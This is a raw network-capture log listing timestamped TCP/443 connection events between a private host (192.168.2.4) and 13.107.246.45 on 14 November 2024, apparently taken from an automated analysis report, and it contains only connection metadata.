                            Nov 14, 2024 23:39:14.991494894 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.994992018 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.995016098 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.995054960 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.995171070 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.995171070 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.005162001 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.005162001 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.005228043 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.005270004 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.006412029 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.006412029 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.006477118 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.006511927 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.008218050 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.008248091 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.008305073 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.014122009 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.014132023 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.018841028 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.018924952 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.019308090 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.027570009 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.027620077 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.028264046 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.028347015 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.028423071 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.036854982 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.036886930 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.039696932 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.039844036 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.039887905 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.042484999 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.042496920 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.042557955 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.042562008 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.097400904 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.097484112 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.097585917 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.098118067 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.098154068 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.433691978 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.434202909 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.434263945 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.434602022 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.434654951 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.563384056 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.563545942 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.563772917 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.563774109 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.563774109 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.566330910 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.566428900 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.566545963 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.566667080 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.566689014 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.733614922 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.734014988 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.734028101 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.734442949 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.734447956 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.784379005 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.787239075 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.787322998 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.787875891 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.787890911 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.796155930 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.796874046 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.796935081 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.797267914 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.797319889 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.838963032 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.839375973 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.839435101 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.839725018 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.839740038 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.862577915 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.862626076 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.862709045 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.862854004 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.862869024 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.862876892 CET55271443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.862880945 CET4435527113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.865847111 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.865906000 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.866656065 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.866744995 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.866760969 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.868024111 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.868117094 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.915082932 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.915215015 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.915374041 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.915374041 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.915374994 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.917582989 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.917669058 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.917768002 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.918060064 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.918139935 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.932346106 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.932425022 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.932529926 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.932626009 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.932626963 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.932719946 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.932719946 CET55272443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.932760000 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.932790995 CET4435527213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.934484959 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.934545994 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.934623003 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.934752941 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.934770107 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.969916105 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.969950914 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.970002890 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.970149040 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.970268965 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.970313072 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.970344067 CET55274443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.970359087 CET4435527413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.972254992 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.972338915 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:15.972668886 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.972668886 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:15.972794056 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.227283955 CET55273443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.227350950 CET4435527313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.305429935 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.305949926 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.306035042 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.306303024 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.306318045 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.436913013 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.437072039 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.437130928 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.437237978 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.437263966 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.437279940 CET55275443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.437288046 CET4435527513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.439790964 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.439832926 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.439968109 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.440080881 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.440109015 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.594604969 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.595021009 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.595107079 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.595545053 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.595597982 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.663475037 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.663939953 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.664004087 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.664211035 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.664227009 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.689723969 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.690121889 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.690182924 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.690491915 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.690546036 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.724562883 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.724611044 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.724905014 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.724905968 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.724905968 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.727229118 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.727315903 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.727634907 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.727745056 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.727776051 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.793229103 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.793445110 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.793636084 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.793636084 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.793637037 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.795640945 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.795732021 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.795806885 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.795965910 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.795985937 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.832973003 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.833045959 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.833157063 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.833257914 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.833257914 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.833350897 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.833350897 CET55278443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.833389997 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.833424091 CET4435527813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.835366964 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.835450888 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.835522890 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.835645914 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.835669994 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:16.946140051 CET55276443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:16.946202993 CET4435527613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.056407928 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.057007074 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.057068110 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.057411909 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.057466984 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.102410078 CET55277443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.102473021 CET4435527713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.191751957 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.191838980 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.192116022 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.192116022 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.192116022 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.194407940 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.194490910 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.194818974 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.194819927 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.194947958 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.461066008 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.461550951 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.461582899 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.461976051 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.461986065 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.493051052 CET55279443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.493113041 CET4435527913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.532330990 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.532682896 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.532742023 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.533042908 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.533058882 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.573170900 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.573508978 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.573551893 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.573924065 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.573941946 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.594156981 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.594227076 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.594414949 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.594414949 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.594414949 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.596715927 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.596796989 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.596888065 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.597018003 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.597052097 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.625288010 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.625638008 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.625711918 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.626013994 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.626029015 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.661545038 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.661612034 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.661719084 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.661839962 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.661839962 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.661839962 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.661839962 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.664192915 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.664278030 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.664534092 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.664650917 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.664674044 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.758687019 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.758784056 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.758840084 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.758925915 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.758925915 CET55282443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.758966923 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.758995056 CET4435528213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.761164904 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.761214018 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.761292934 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.761418104 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.761446953 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.899185896 CET55281443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.899247885 CET4435528113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.912631989 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.912739992 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.912976980 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.913031101 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.913031101 CET55283443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.913049936 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.913072109 CET4435528313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.916529894 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.916560888 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.916666031 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.916990995 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.917009115 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.949167967 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.949786901 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.949846983 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.950165033 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.950217009 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:17.977319956 CET55280443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:17.977384090 CET4435528013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.080240011 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.080379963 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.080573082 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.080573082 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.080573082 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.083481073 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.083523035 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.083597898 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.083784103 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.083791971 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.328550100 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.329230070 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.329294920 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.329819918 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.329871893 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.383658886 CET55284443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.383728981 CET4435528413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.424923897 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.425462008 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.425523043 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.426043034 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.426095963 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.459304094 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.459407091 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.459634066 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.459634066 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.459717035 CET55285443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.459753990 CET4435528513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.462364912 CET55290443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.462408066 CET4435529013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.462631941 CET55290443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.462631941 CET55290443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.462706089 CET4435529013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.510674953 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.511070967 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.511110067 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.511632919 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.511646032 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.556318998 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.556463957 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.556679010 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.556679010 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.556679010 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.559218884 CET55291443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.559308052 CET4435529113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.559413910 CET55291443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.559704065 CET55291443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.559766054 CET4435529113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.643953085 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.644016981 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.644184113 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.644272089 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.644273043 CET55287443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.644311905 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.644342899 CET4435528713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.647057056 CET55292443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.647090912 CET4435529213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.647162914 CET55292443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.647281885 CET55292443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.647289038 CET4435529213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.670011997 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.670490026 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.670500994 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.671013117 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.671019077 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.774302006 CET55286443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.774363995 CET4435528613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.807955980 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.807987928 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.808043003 CET4435528813.107.246.45192.168.2.4
